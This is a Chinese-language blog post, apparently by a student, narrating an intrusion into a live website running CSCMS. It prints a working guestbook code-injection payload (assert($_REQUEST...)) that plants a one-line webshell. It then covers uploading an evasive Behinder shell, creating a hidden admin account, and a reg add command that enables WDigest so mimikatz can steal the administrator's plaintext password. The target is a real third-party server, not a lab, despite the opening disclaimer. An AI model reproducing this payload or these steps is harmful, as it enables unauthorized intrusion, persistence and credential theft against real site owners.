温馨提示
本文章仅供学习交流使用,文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!
题外话:因为该站是我几个月前渗透的了,所以云悉的截图也是拿的几个月前的截图,因为现在我莫得邀请码(逐渐悲伤)
因为本人学生党一枚 发文免不了带点作业效果 见谅~
0x01 信息搜集
首先确认目标 因为是SQ网站 所以要打码 (狗头保命)
这里先老规矩,信息收集一波 分析了下该网站用的是程氏cms,运气好,还真是当初那个三步getshell的版本(手动滑稽)
0x02 Nday一把梭
什么也不要管什么也不要问 直接砸Nday下去 找到当年漏洞位置>留言板:
域名后面加一个gbook 例如www.123.com/gbook/ 默认是这个位置 反正随机应变就可以了(狗头保命)
直接留言板把Payload一把梭
payload:{cscnsphp}assert($_REQUEST{QCMB});{/cscmsphp}
实操图:(名字随便写 留言内容就直接砸payload下去)
然后出现如下界面 你会发现留言内容消失了
只剩下一个昵称 那这样就是正确的 因为你的留言内容拼接进PHP源文件里面去了
访问gbook/lists/1这个目录 出现如下画面
这时候用你的一句话密码=phpinfo(); 执行该函数拿下webshell
用webshell工具链接 填写好地址 密码 有时候数据为空 就换解码器
这里我上传了一个免杀的冰蝎马 因为这站有云防护 一般马过不去
冰蝎链接:
顺带传了点免杀PHP马
访问位置 查看权限 查看端口 权限还高 3389开放?芜湖!起飞
管理员权限
直接冰蝎里面上dos命令 创建用户 提权 一气呵成
普通用户界面也没啥好康的 (不要在意时间 因为是几个月前搞的了 好多地方都修复了 幸好以前截了图)
我们怎么甘心止步于此?打开磁盘 斯国一!!
(少儿不宜哈)
因为服务器是2016的版本
mimikatz无法直接导出明文密码,所以要通过编辑注册表启用密码记录
command如下
reg add HKLMSYSTEMCurrentControlSetControlSecurityProvidersWDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
mz是免杀猕猴桃,专门拿来抓取登录回话密码
只要管理员登录了这台服务器,他的密码就会被我偷到,免得我的账户被发现了给我删除了
接下来看看用户回话日志,哦,貌似有一个叫administrators的用户登录过,这不代表着这管理员登录日志不是就被我的猕猴桃抓到了吗?
接下来我们可以看见管理员账户被我们抓取到了
上了管理员账户 然后就可以嘿嘿嘿了
然后就渗透到这里 本人小白一枚 大佬轻喷哈